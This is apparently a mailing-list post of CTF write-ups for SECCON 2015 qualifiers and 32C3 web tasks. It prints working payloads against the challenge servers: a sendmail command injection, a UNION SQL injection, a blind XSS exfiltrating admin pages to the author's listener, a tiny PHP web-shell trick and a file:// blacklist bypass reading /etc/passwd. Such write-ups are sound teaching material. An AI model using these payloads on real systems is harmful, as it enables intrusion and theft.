[oss] Seccon CTF and 32C3

[Cernica]

Hello,

The qualifications for Seccon CTF were on December 5 to 6. The top 10 teams
and 3 other teams that won 1st place in other competitions will qualify for
the finals in Japan on January 31, 2016.
There were plenty of teams, and we have participated with the team
PwnThyBytes.

1 6323 217
2 6306 GoatskiN
3 6302 PPP
4 5302 m1z0r3
5 5003 0x0
6 4800 PwnThyBytes
7 4702 Shellphish
8 4700 CodeRed
9 4600 KaSecon
10 4505 Bushwhackers


Team members are: Silviu, Radu, Codrut, Ionut, Vladimir, Catalin, Silvia,
Filip, Alex, Vali, Osiris.
We solved 85% of tasks. I don't know exactly what each member did because
we worked very much in pairs of two people, but I'll say what I did:

Given the large number of members, I worked together with Catalin Irimie on
many tasks.
Most of the tasks were solved with Catalin Irimie:

[1] Connect the server  (Solved by 587)
This was an easy task. All I had to do was to start a tcpdump and connect
to the server, then when I looked into to the output of the tcpdump I found
the flag.


[2] Entry form  (Solved by 189)
This was an easy task too, because just when I looked to the URL "
entryform.pwn.seccon.jp/register.cgi" I told to Catalin that this should be
shellshocker or perl command execution. He managed to find the source code
and the following line got our attention:
"open(SH, "|/usr/sbin/sendmail -bm '".$q->param("mail")."'");"
A system command is dynamicly contructed with unfiltered user input. All we
had to do was to inject a new command and read the output.
/register.cgi?name=notempty&mail='%20-bp|ls%20%23

Then we found the flag.


[3] Bonsai XSS Revolutions  (Solved by 49)
At this task the organizer gave us an .exe file that "simulated" an
administrator that is looking at his emails on his "email client". At first
glance we thought that we should make a dns resolver and use seccon.jp ip
address to resolve "tsuribori.test" and then we would send an email to
"keigo.yamazaki at tsuribori.test".

After a while I figured out that the .exe file would create a smtp server
that listen on port 25 and all we have to do is to send emails to localhost
and the administrator would see the email sent by us.
We created a python script that send emails. After some tests we found an
XSS in parameter "Date". We used that XSS to print with "alert()" the
source code of the html page and we saw that the User-Agent of the browser
is rewritten:
"<html>(...)<body>
<script>var navigator=new Object;navigator.userAgent='This is NOT a flag.
Use XSS to obtain it.';</script>(...)"

This problem has many solves:
a. I told Catalin that we could open the .exe file with javascript disabled
from IE and then the code "<script>var navigator=new
Object;navigator.userAgent='This is NOT a flag. Use XSS to obtain
it.';</script>" wouldn't execute anymore. After the .exe file was opened
and the page was loaded we just enabled javascript and print the User-Agent.

b. Open a new tab and load an image at ip:port. We shuold find the flag in
User-Agent.


[4] Reverse-Engineering Android APK 2  (Solved by 11)
At this task worked many team members: Silviu Popescu reversed the apk and
found the authentication flow. The apk uses AES/ECB to encrypt data for
each request to the server.
With tcpdump we extracted the requests to the server and we saw what we
should send to it.
We made in python a script that sent to the server all user data encrypted
and used this to find other security vulnerability.
  They gave us a hint: “The key is stored in the application, but you will
need to hack the server.“, but we already knew that.
We found an SQL Injection in parameter "email". Was a blind SQL Injection,
but Catalin had an idea to make it simple. We extracted the password of our
account (stored into the database) and used it to extract data from the
database.
With the following payload we extracted all unique_id from the database:
&email=seccontest2 at mailinator.com' and 1=2 union all select 215,
'3809f46bc99ed836cd29eaf', NULL, NULL, BINARY
'X22dCZC6XbcwSHRN4NWR8XVYNbw2MzY0NDk1ZTJl', '6364495e2e', (select
group_concat(unique_id from users),NULL FROM users#

Having all unique_id we made a script to decrypt(AES/ECB) the flag with
each unique_id we extracted from the database.
And one of the lines was our flag: "SECCON{6FgshufUTpRm}"



[5] Please give me MD5 collision files  (Solved by 5)
This task was very intersting and hard and was solved because Catalin
insisted to solve.

They gave us an application to insert two different files with same md5
(other teams could do that too). The application would compute
length=len(file1)+len(file2) and if the length would be the lowest from the
game and you survive 30 min on first place you will obtain the flag.

Suppose team1 found md5("123456789")=md5("1234567"), the total length would
be 16
1. md5.valueOfTeam1    len 16

Suppose team2 found md5("1234567890")=md5("12345670"), the total length
would be 18
1. md5.valueOfTeam1    len 16
2. md5.valueOfTeam2    len 18

Suppose team3 found md5("123456789000")=md5("1234567000"), the total length
would be 20
1. md5.valueOfTeam1    len 16
2. md5.valueOfTeam2    len 18
3. md5.valueOfTeam3    len 20

Suppose team4 found md5("1234567")=md5("123456"), the total length would be
13
1. md5.valueOfTeam4    len 13
2. md5.valueOfTeam1    len 16
3. md5.valueOfTeam2    len 18
4. md5.valueOfTeam3    len 20

Team4 has to stay 30 min on first place to get the flag.


Another tip of the game is that if you find the md5 of the Team4
 md5("1234567") then you can submit it and remove them from the first place
and the hash would go to a black list(can't be used again).
If Team(n) would submit md5 of Team4 the scoreboard would be:
2. md5.valueOfTeam1    len 16
3. md5.valueOfTeam2    len 18
4. md5.valueOfTeam3    len 20


The tactic here was to find two different md5 to collide and we found them.
The length was 64.
Because the length was 64 you could construct other files that are
different but have the same md5:
Supose md5("a"*4) = md5("b"*64), then md5("a"*4 + ord(i)) = md5("b"*64 +
ord(i)), 0<=i<256

There are 3 pairs of files that have the same md5 and are the lowest find
so far and public. Several teams found all 3 pairs and ruled the game (but
no one spent 30 min because the md5 was easy to find and invalidate) till
the organizers decided to remove the time constraint.


After we found out we don't have to stay 30 min on first place, we submited
2 files with same md5 and length 65+65 and then we started to invalidate
others md5 and we got our flag.




32C3 CTF
Last week I participated at 32C3 CTF alone and I made some web tasks.
The CTF started on 27 Dec. and ended on 29 Dec. (48h).
Top 3 are:
pasten          7350
Dragon Sector   6200
First Order     5100

I registered an account and I played alone, for fun, few hours because I
went to some presentations (btw, perl jam 2 I enjoyed the most).

At the CTF I made 4 tasks:
Kummerkasten 300  Solves: 61
TinyHosting  250  Solves: 71
MonkeyBase   200  Solves: 26
ITD          150  Solves: 11

[1] Kummerkasten
When I visited the url from the description I saw a Contact form, which
told me that could be a blind XSS behind that.
I inserted in parameter "body": <img src="my_ip:2222" /> and with nc I
listened for any incoming connection. The connection was made immediately I
sent the request to the administrator.
After few tests I found that it was a XSS with no restriction. Knowing that
I just sent the source code of the administrator page and I saw some more
sections:
/admin/bugs
/admin/token
Getting the html source code of those pages I've noticed 2 images:
/admin/img/root_pw.png?20151228
/admin/img/token.png?20151228

I sent the content of the images to my server and combining the two strings
obtained from the images I get the flag: 1_4m_numb3r_0n3!629880


[2] TinyHosting
This time I have a file upload where I can upload any file with any
extension, but the length of the content is 7 bytes.
I have to make a php shell that is 7 bytes.
The solution was:
a. to upload a file test.php and as content:   <?=`*`;
b. then I have to make some files with name "eval" and another one with
name "echo '<?php echo system($_GET[1]);?>' > shell.php"
c. when I will visit the tiny shell test.php then will execute "<?=`*`".
This code will make a list of all files from directory and will sort them
alphabetically. Will take the first line combined with the others and will
execute system command.
My files in that directory are:
eval
echo '<?php echo system($_GET[1]);?>' > shell.php
index.html
test.php

When test.php is invoked, then the following commands will be executed on
the server side:
eval "echo '<?php echo system($_GET[1]);?>' > shell.php"
eval "index.html"
eval "wtest.php"

first one will create a php shell with name shell.php and then I will be
able to send any system command and see the output. The rest is history.

[3] MonkeyBase
This wasn't a hard task, but I have some problems because of lots of red
herring.
The web application had lots of functionalities and I had to check for SQL
Injection, Blind XSS, Remote Command Execution, unserialize php data, check
for hash length extension. In the end was file inclusion (I think I could
obtain a RCE but wasn't necessary). With that file inclusion I obtain the
flag from one of the php source code.

[4] ITD
This was an interesting task. Was possible to use "file_get_content" to
read file, but they blocked most of the php wrappers. The problem was when
they tried to block "file" wrapper, they blacklisted "file:///", but it is
possible to use "file://localhost/etc/passwd" to read local files.
The blacklist is:
$w =
array('<','>','\.\.','^/+.*','file:///','php://','data://','zip://','ftp://
','phar://','zlib://','glob://','expect://');


Knowing how to read files I found the path to the flag. I had to execute a
binary and if that binary returns "LOOSE" the php script would stop, else
would give me the flag.
Here were many solves. I choose to submit lots of requests on 10 threads
till one of the execution would fail and would not return any string to php
script.
I made a python script that send  requests on 10 threads till one of the
response would give me the flag.

All the best,
Cernica Ionut
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://cursuri.cs.pub.ro/pipermail/oss/attachments/20160104/3aa9182d/attachment.html>